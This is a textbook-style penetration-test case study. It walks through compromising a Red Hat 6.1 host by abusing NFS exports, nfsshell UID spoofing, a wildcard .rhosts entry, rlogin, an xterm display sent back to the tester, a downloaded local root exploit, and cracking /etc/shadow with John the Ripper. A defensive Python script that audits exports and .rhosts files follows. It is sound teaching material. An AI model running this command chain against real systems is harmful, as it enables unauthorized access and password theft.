
Case Study: UNIX Penetration

During an internal penetration test we found some interesting services running on a UNIX system at IP address 10.10.10.10. Our Nmap port scan (using the command shown below) revealed that NFS (port 2049) and rlogin (port 513) were running on the target system. Nmap's operating system detection also revealed that the operating system was Red Hat 6.1. We determined that we might be able to exploit NFS and rlogin to gain access to the system.

# nmap -sT -O 10.10.10.1-254

First we needed to determine what information was available from NFS. We issued the command:

# showmount -e 10.10.10.10

This command returned the information that users' home directories were exported. Using the mount command we mounted a user's home directory, which we will call user1.

Since rlogin was also running on the server, we could attempt to establish a trust relationship so that we could log in to the system with no password. A .rhosts file in a user's home directory specifies what systems are trusted and allows users from those hosts to log in with no password. Therefore, if we could create a .rhosts file in the user1 home directory and add an entry to allow it to trust our system, we could log in with no password.

Unfortunately, the mounted file system was not writable. We attempted to use nfsshell to get around this problem. Using nfsshell, we attempted to change the UID to "1" on the mounted file system to give us write access. This is done by simply specifying the UID value in the nfsshell client:

nfs> uid 1

Using the status command we verified that the UID was changed.

Now that we had write access to the file system, we could create a .rhosts file. Adding a "++" to the .rhosts file causes the target to trust any user on every system. We issued the following command to create the .rhosts file in the user1 home directory.

# echo ++ >.rhosts

Now we could log in to the system as user1:

# rlogin -l user1 10.10.10.10

Now we were logged in as user1. We wanted to elevate our privileges to root. To help us achieve this, we sent an Xterm back to our system. On our system we issued the following command:

# xhost +10.10.10.10

On the target system, we executed the following command to export the display. The IP address of our laptop was 10.10.10.100.

# xterm -display 10.10.10.100:0.0

Now we had a fully functional Xterm and could execute commands as if we were sitting at the console. Next, we started to research local buffer overflow attacks that we could use to elevate our access. Searching Packetstorm we found a local buffer overflow for Red Hat 6.1 that yielded root access. We downloaded an exploit called vixi-crontab. We ran this exploit and obtained root privileges on the system.

Once we had root we captured the password and shadow password files and cracked them using John the Ripper.

# unshadow /etc/passwd /etc/shadow > crack.1
# john crack.1

Now we had additional passwords to attempt on other systems.

Lessons Learned

Be careful what you export through NFS. Since the home directories were exported in this instance, we used them to attack the system. Also, the use of rlogin should be avoided. Instead, users and administrators should use secure applications, such as SSH, that encrypt the remote sessions. Finally, the system should have been patched against the exploit that we used.
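The two configuration weaknesses this case study turned on, home directories exported over NFS to any host and a wildcard entry in a user's .rhosts file, are both visible in plain text files on the server. The audit script below is an added example written for this chapter, not a tool from the case study; it parses exports(5)-style lines and rhosts-style lines and reports the conditions an administrator would want to find first: exports reachable from any host, root_squash disabled, writable home directories served with only AUTH_SYS (where the server accepts whatever UID the client asserts, which is what made the nfsshell uid change effective), and trust entries whose host field begins with "+". The sample /etc/exports and .rhosts contents are constructed for the example; the home-directory prefixes and the treatment of a bare "(options)" entry as applying to every host are assumptions stated in the comments.

```python
"""Audit /etc/exports and .rhosts content for the weaknesses used in the
case study. Added example; sample inputs below are constructed."""

import re
from dataclasses import dataclass

# Constructed sample: a risky /etc/exports of the kind the case study implies.
SAMPLE_EXPORTS = """\
# home directories exported to every host, AUTH_SYS only
/home *(rw,sync)
/export/software 10.10.10.0/24(ro,sync)
/srv/build 10.10.10.100(rw,no_root_squash)
"""

# Constructed sample: the entry the case study wrote, plus one normal entry.
SAMPLE_RHOSTS = """\
++
buildhost.example.internal user1
"""

# Assumption: paths under these prefixes hold user home directories.
HOME_PREFIXES = ("/home", "/export/home", "/users")


@dataclass
class Export:
    path: str
    clients: list  # list of (client, set-of-options) tuples


def parse_exports(text):
    """Parse exports(5) lines of the form: <path> [client(opt,opt)] ...
    A spec with no client part, e.g. "(ro)", is treated as every host ("*");
    a path with no client spec at all is also treated as world-exported."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:]
        clients = []
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            if m is None:          # malformed spec: keep it verbatim, no options
                clients.append((spec, set()))
                continue
            client = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            clients.append((client, opts))
        if not specs:
            clients.append(("*", set()))
        exports.append(Export(path, clients))
    return exports


def is_home_export(path):
    return any(path == p or path.startswith(p + "/") for p in HOME_PREFIXES)


def audit_exports(text):
    """Return (path, client, reason) findings for risky export entries."""
    findings = []
    for ex in parse_exports(text):
        for client, opts in ex.clients:
            world = client == "*" or client.startswith("*.")
            writable = "rw" in opts
            kerberos = any(o.startswith("sec=krb") for o in opts)
            if "no_root_squash" in opts:
                findings.append((ex.path, client, "no_root_squash: client root is root on the server"))
            if world and writable:
                findings.append((ex.path, client, "rw export to any host"))
            elif world:
                findings.append((ex.path, client, "export to any host"))
            if is_home_export(ex.path) and writable and not kerberos:
                # With AUTH_SYS the server trusts the UID the client asserts,
                # so any client with write access can act as any non-root user.
                findings.append((ex.path, client, "writable home directories with client-asserted UIDs"))
    return findings


def audit_rhosts(text, path="~user1/.rhosts"):
    """Flag wildcard trust in rhosts-style lines: '<host> [user]'.
    A host field beginning with '+' trusts every host, a user field of '+'
    trusts every user on that host; the case study's "++" is caught because
    its host field starts with '+'."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host.startswith("+"):
            findings.append((path, n, f"wildcard host entry {line!r}"))
        elif user == "+":
            findings.append((path, n, f"every user on {host} trusted: {line!r}"))
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS) + audit_rhosts(SAMPLE_RHOSTS):
        print(*f, sep="\t")
```

Run against the real files (`open("/etc/exports").read()` and each user's .rhosts) the same functions produce the findings; restricting exports to named hosts, keeping root_squash, using `sec=krb5` for writable home directories, and removing rhosts trust in favour of SSH keys clears each of them.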
